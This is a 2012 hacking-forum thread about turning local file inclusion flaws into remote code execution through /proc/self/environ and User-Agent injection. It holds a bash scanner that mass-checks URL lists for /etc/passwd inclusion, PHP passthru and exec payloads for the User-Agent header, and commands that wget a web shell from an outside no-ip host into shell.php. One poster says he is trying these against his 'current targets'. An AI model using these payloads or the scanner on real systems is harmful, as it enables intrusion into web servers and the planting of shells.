Author Topic: LFI exploit running in the wild  (Read 3670 times)

0 Members and 3 Guests are viewing this topic.

Offline neusbeer

  • Knight
  • **
  • Posts: 223
  • Cookies: 11
  • Beer makes you stronger XD
    • View Profile
    • http://www.facebook.nl/hackneus
LFI exploit running in the wild
« on: January 27, 2012, 09:19:35 am »
There's a 'new' lfi attack being used a lot at this moment.
read this article http://www.devilscafe.in/2012/01/lfi-and-shell-upload-with-tamper-data.html
in's a lfi with standard /etc/passwd inclusion, and right after that a check
for /proc/self/eviron
I never heard of this 'link'.. what is it?  I know it's from linux.. is it the
running account info on the server?
anyways it allows the use of a shell ;-)


I made a script to check the exploit on a url list.
input a list with /etc/passwd in the url (example list)
and results in a logfile with /proc/self/eviron possible.
(after that tampering user-agent to get your shell up there :-))
Code: [Select]
#!/bin/bash
cat "$1" | while read url ; do
 test=$(curl "$url" | grep -i "root")
 if [ -z "$test" ]; then
   echo "No LFI in $url"
  else
   echo "LFI found in $url"
   echo "$url" >> output.log
  fi
done
cat output.log | sed 's/\/etc\/passwd/\/proc\/self\/environ/g' | while read url1 ; do
  test=$(curl "$url1" | grep -i "document_root")
  if [ -z "$test" ]; then
    echo "No /proc/self/environ in $url1"
  else
   echo "/proc/self/environ found in $url1"
   echo "$url1" >> final_list.log
  fi
done
« Last Edit: January 27, 2012, 09:19:55 am by neusbeer »
--Neusbeer

Offline imation

  • Peasant
  • *
  • Posts: 141
  • Cookies: 2
    • View Profile
Re: LFI exploit running in the wild
« Reply #1 on: January 27, 2012, 10:04:03 am »
saw this the other day, very interesting!

Ive been using TamperData for years now, brilliant tool

Offline neusbeer

  • Knight
  • **
  • Posts: 223
  • Cookies: 11
  • Beer makes you stronger XD
    • View Profile
    • http://www.facebook.nl/hackneus
Re: LFI exploit running in the wild
« Reply #2 on: January 27, 2012, 11:00:07 am »
I don't.. I use mostly Fillder2 (gives me mostly the same results)..
Testing now that tamperdata script from firefox..
looks handy..
--Neusbeer

Offline ca0s

  • VIP
  • Sir
  • *
  • Posts: 432
  • Cookies: 53
    • View Profile
    • ka0labs #
Re: LFI exploit running in the wild
« Reply #3 on: January 27, 2012, 12:02:14 pm »
/proc/self/environ contains environment variables for curren process.
In apache (idk if in another servers works too) it contains several fields of information, being one of them the User-agent of the client. If you can include /proc/self/environ and you set your user-agent to something like "<?php passthru($_GET['s']); ?>" that PHP code will be executed.

Offline neusbeer

  • Knight
  • **
  • Posts: 223
  • Cookies: 11
  • Beer makes you stronger XD
    • View Profile
    • http://www.facebook.nl/hackneus
Re: LFI exploit running in the wild
« Reply #4 on: January 27, 2012, 01:32:48 pm »
yes.. that's the idea! :D


only I'm struggling with the codes.. :P


in that way as you describe I get an error about wrong char use in the T_STRING
the ' won't work... at least at my current targets..
so <?exec('wget http://xx.no-ip.org/Shells/SyRiAn_Sh3ll_V7.txt -O shell.php');?>
willl return and error that the ' isn't accepted.
when I try with passtru,
<? passthru($_GET['cmd']); ?> in the USER AGENT and add ?cmd=wget http://xx.no-ip.org/Shells/SyRiAn_Sh3Lll_V7.txt -O shell.php
I get an error that I'm not giving a url.
(think spaces in url?)

--Neusbeer

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: LFI exploit running in the wild
« Reply #5 on: January 27, 2012, 03:07:55 pm »
yes.. that's the idea! :D


only I'm struggling with the codes.. :P


in that way as you describe I get an error about wrong char use in the T_STRING
the ' won't work... at least at my current targets..
so <?exec('wget http://xx.no-ip.org/Shells/SyRiAn_Sh3ll_V7.txt -O shell.php');?>
willl return and error that the ' isn't accepted.
when I try with passtru,
<? passthru($_GET['cmd']); ?> in the USER AGENT and add ?cmd=wget http://xx.no-ip.org/Shells/SyRiAn_Sh3Lll_V7.txt -O shell.php
I get an error that I'm not giving a url.
(think spaces in url?)

I always use <?php ?>, might be the problem. Dunno.

Anyway, on another note. This is old. Old. Old. Old. We have posts about this back from 2006-7. Just sayin.
« Last Edit: January 27, 2012, 03:08:41 pm by ande »
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline FuyuKitsune

  • Knight
  • **
  • Posts: 292
  • Cookies: 21
    • View Profile
Re: LFI exploit running in the wild
« Reply #6 on: January 27, 2012, 03:43:38 pm »
Aw man, where are the archives when you need them. Somebody posted a guide on something very similar to this (it was named something like LFI  + log poisoning).

Offline ca0s

  • VIP
  • Sir
  • *
  • Posts: 432
  • Cookies: 53
    • View Profile
    • ka0labs #
Re: LFI exploit running in the wild
« Reply #7 on: January 27, 2012, 04:49:45 pm »
Aw man, where are the archives when you need them. Somebody posted a guide on something very similar to this (it was named something like LFI  + log poisoning).
It is the same concept. You "poison" the logs with an user-agent containing PHP code and then execute it with a LFI. But you need read rights to those logs.

Offline neusbeer

  • Knight
  • **
  • Posts: 223
  • Cookies: 11
  • Beer makes you stronger XD
    • View Profile
    • http://www.facebook.nl/hackneus
Re: LFI exploit running in the wild
« Reply #8 on: January 27, 2012, 08:54:18 pm »
log poisioning is something different..


hmm and I still can't get the damn thing to work :P
--Neusbeer

Offline neusbeer

  • Knight
  • **
  • Posts: 223
  • Cookies: 11
  • Beer makes you stronger XD
    • View Profile
    • http://www.facebook.nl/hackneus
Re: LFI exploit running in the wild
« Reply #9 on: February 10, 2012, 08:15:13 pm »
I always use <?php ?>, might be the problem. Dunno.

Anyway, on another note. This is old. Old. Old. Old. We have posts about this back from 2006-7. Just sayin.
(sorry double post, but just saw this post)


maybe old.. but I just found out.. ;)
and why isn't it fixed by now ?


I often check spiderlabs blog for new (or in this case old) exploits/hack tries on their honeypots and servers etc.. and some other contributers on this.
often gives me a lot of new info what is being exploited at this moment, and
even the requests etc.


ow and php quote has to end with ?>  .. always?

--Neusbeer

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: LFI exploit running in the wild
« Reply #10 on: February 10, 2012, 09:20:13 pm »
(sorry double post, but just saw this post)


maybe old.. but I just found out.. ;)
and why isn't it fixed by now ?


I often check spiderlabs blog for new (or in this case old) exploits/hack tries on their honeypots and servers etc.. and some other contributers on this.
often gives me a lot of new info what is being exploited at this moment, and
even the requests etc.

The /proc/self/environ is not an exploit or bug in itself. It is still just a LFI problem. Therefore it is not fixed. Fix the LFI vuln and you fix the /proc/self/environ problem.



ow and php quote has to end with ?>  .. always?

PHP tags are always <?php /* do shit here */ ?> or <? /* Do shit here */ ?> depending on version and usage etc.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline neusbeer

  • Knight
  • **
  • Posts: 223
  • Cookies: 11
  • Beer makes you stronger XD
    • View Profile
    • http://www.facebook.nl/hackneus
Re: LFI exploit running in the wild
« Reply #11 on: February 11, 2012, 12:22:15 am »
ok... I've got the wrong examples then.. (about ending with ?>)
ty..
--Neusbeer